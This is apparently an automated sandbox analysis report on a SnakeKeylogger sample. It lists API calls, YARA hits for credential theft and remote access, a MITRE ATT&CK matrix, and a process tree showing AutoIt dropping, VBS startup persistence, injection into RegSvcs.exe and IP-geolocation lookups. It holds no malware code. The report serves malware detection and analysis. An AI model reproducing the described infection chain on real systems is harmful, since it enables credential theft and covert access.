Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008B862B cpuid 0_2_008B862B
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: MonitorFromWindow,GetMonitorInfoA,GetDesktopWindow,GetClientRect,CreateWindowExW,GetLastError,MonitorFromWindow,MonitorFromWindow,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetWindowRect,GetClientRect,SetWindowPos,CreateBitmap,CreateCaret,SetScrollInfo,GetDoubleClickTime,GetSystemMenu,CreatePopupMenu,AppendMenuA,AppendMenuA,AppendMenuA,CreateMenu,DeleteMenu,DeleteMenu,AppendMenuA,AppendMenuA,GetKeyboardLayout,GetLocaleInfoA,ShowWindow,SetForegroundWindow,GetForegroundWindow,UpdateWindow,MsgWaitForMultipleObjects,PeekMessageW,IsWindow,DispatchMessageW,IsDialogMessageA,PeekMessageA,GetForegroundWindow,MsgWaitForMultipleObjects,DispatchMessageW,PeekMessageW,IsWindow,IsDialogMessageA,5_2_00007FF75ECB53E3
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_00007FF75ED89FB8
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: EnumSystemLocalesW,5_2_00007FF75ED89D30
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: GetLocaleInfoA,DefWindowProcW,5_2_00007FF75ECB1B9F
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: EnumSystemLocalesW,5_2_00007FF75ED89A14
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00007FF75ED89714
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: EnumSystemLocalesW,5_2_00007FF75ED82EDC
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: GetLocaleInfoW,5_2_00007FF75ED823A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\System32\notepad.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED5B700 CreateNamedPipeA,CloseHandle,CreateNamedPipeA,ConnectNamedPipe,GetLastError,CloseHandle,GetLastError,5_2_00007FF75ED5B700
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008C4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_008C4E87
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008D1E06 GetUserNameW,0_2_008D1E06
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008C3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_008C3F3A
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008949A0
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 8kDIr4ZdNj.exe, 00000000.00000002.2156067931.0000000001589000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165423326.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2164617787.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000002.2180017227.0000000001983000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165894185.000000000197F000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2164112148.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2155325164.0000000001964000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165043158.0000000001987000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: lecheries.exe, 00000002.00000003.2165423326.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2164617787.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000002.2180017227.0000000001983000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165894185.000000000197F000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2164112148.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2155325164.0000000001964000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165043158.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000002.2297579381.0000000001680000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mcupdate.exe

Stealing of Sensitive Information

Source: Yara match | File source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2304736561.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: lecheries.exe PID: 4596, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3496, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: EmbeddedExe2.exe PID: 6968, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: lecheries.exe PID: 2276, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPED
Source: 8kDIr4ZdNj.exe | Binary or memory string: WIN_81
Source: 8kDIr4ZdNj.exe | Binary or memory string: WIN_XP
Source: 8kDIr4ZdNj.exe | Binary or memory string: WIN_XPe
Source: 8kDIr4ZdNj.exe | Binary or memory string: WIN_VISTA
Source: 8kDIr4ZdNj.exe | Binary or memory string: WIN_7
Source: 8kDIr4ZdNj.exe | Binary or memory string: WIN_8
Source: lecheries.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: Yara match | File source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: lecheries.exe PID: 4596, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3496, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: EmbeddedExe2.exe PID: 6968, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: lecheries.exe PID: 2276, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2304736561.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: lecheries.exe PID: 4596, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3496, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: EmbeddedExe2.exe PID: 6968, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: lecheries.exe PID: 2276, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPED
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_00906283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00906283
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_00906747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00906747
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECEFE90 socket,SetHandleInformation,setsockopt,getaddrinfo,htons,inet_addr,htonl,htonl,htons,bind,listen,closesocket,WSAGetLastError,closesocket,closesocket,WSAGetLastError,5_2_00007FF75ECEFE90
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECEF930 closesocket,socket,SetHandleInformation,setsockopt,setsockopt,setsockopt,htonl,htons,bind,WSAGetLastError,WSAGetLastError,htons,htonl,htons,connect,WSAGetLastError,5_2_00007FF75ECEF930
MITRE ATT&CK Matrix (the number beside a technique is the report's count badge for that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (111) | Valid Accounts (2) | Native API (3) | Scripting (111) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (11) | Input Capture (21) | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (2) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Input Capture (21) | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Valid Accounts (2) | Valid Accounts (2) | Obfuscated Files or Information (2) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Clipboard Data (3) | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Registry Run Keys / Startup Folder (2) | Access Token Manipulation (21) | DLL Side-Loading (1) | NTDS | System Information Discovery (136) | Distributed Component Object Model | Input Capture | Application Layer Protocol (13) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (213) | Masquerading (1) | LSA Secrets | Security Software Discovery (341) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Registry Run Keys / Startup Folder (2) | Valid Accounts (2) | Cached Domain Credentials | Virtualization/Sandbox Evasion (31) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (31) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (21) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (213) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | System Network Configuration Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph (ID: 1587675, Sample: 8kDIr4ZdNj.exe, Startdate: 10/01/2025, Architecture: WINDOWS, Score: 100)

Contacted hosts: reallyfreegeoip.org, checkip.dyndns.org, checkip.dyndns.com
Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures
Signature on reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)

Process tree recovered from the graph:
8kDIr4ZdNj.exe (started)
    dropped: C:\Users\user\AppData\Local\...\lecheries.exe, PE32
    signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    -> lecheries.exe (started)
        dropped: C:\Users\user\AppData\...\lecheries.vbs, data
        signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 2 other signatures
        -> RegSvcs.exe (started)
            dropped: C:\Users\user\AppData\...mbeddedExe2.exe, PE32; C:\Users\user\AppData\...mbeddedExe1.exe, PE32+
            -> EmbeddedExe2.exe (started)
                network: checkip.dyndns.com 193.122.6.168 (49710, 49714, 49726) ORACLE-BMC-31898US United States; reallyfreegeoip.org 104.21.16.1 (443, 49711, 49713) CLOUDFLARENETUS United States
                signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file
                -> cmd.exe (started)
                    -> conhost.exe (started)
                    -> choice.exe (started)
            -> EmbeddedExe1.exe (started)
            -> conhost.exe (started)
wscript.exe (started)
    signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    -> lecheries.exe (started)
        signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Maps a DLL or memory area into another process
        -> RegSvcs.exe (started)
            -> conhost.exe (started)
notepad.exe (started)

Source | Detection | Scanner | Label
8kDIr4ZdNj.exe | 70% | Virustotal |
8kDIr4ZdNj.exe | 66% | ReversingLabs | Win32.Exploit.SnakeKeylogger
8kDIr4ZdNj.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | 100% | Avira | TR/ATRAPS.Gen
C:\Users\user\AppData\Local\konked\lecheries.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\konked\lecheries.exe | 66% | ReversingLabs | Win32.Exploit.SnakeKeylogger

No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 104.21.16.1 | true | false | | high
checkip.dyndns.com | 193.122.6.168 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.dr | false | | high
https://sectigo.com/CPS0 | lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.dr | false | | high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.dr | false | | high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.dr | false | | high
http://ocsp.sectigo.com0 | lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.dr | false | | high
https://www.chiark.greenend.org.uk/~sgtatham/putty/ | lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, EmbeddedExe1.exe, EmbeddedExe1.exe, 00000005.00000000.2180190361.00007FF75ED9A000.00000002.00000001.01000000.00000007.sdmp, EmbeddedExe1.exe, 00000005.00000002.3395994788.00007FF75ED9A000.00000002.00000001.01000000.00000007.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.dr | false | | high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.dr | false | | high
http://checkip.dyndns.org/q | lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe2.exe.3.dr | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003104000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmp | false | |
                                              high
                                              http://reallyfreegeoip.orgEmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drfalse
                                                  high
                                                  https://reallyfreegeoip.orgEmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003104000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.orgEmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003104000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000318A000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
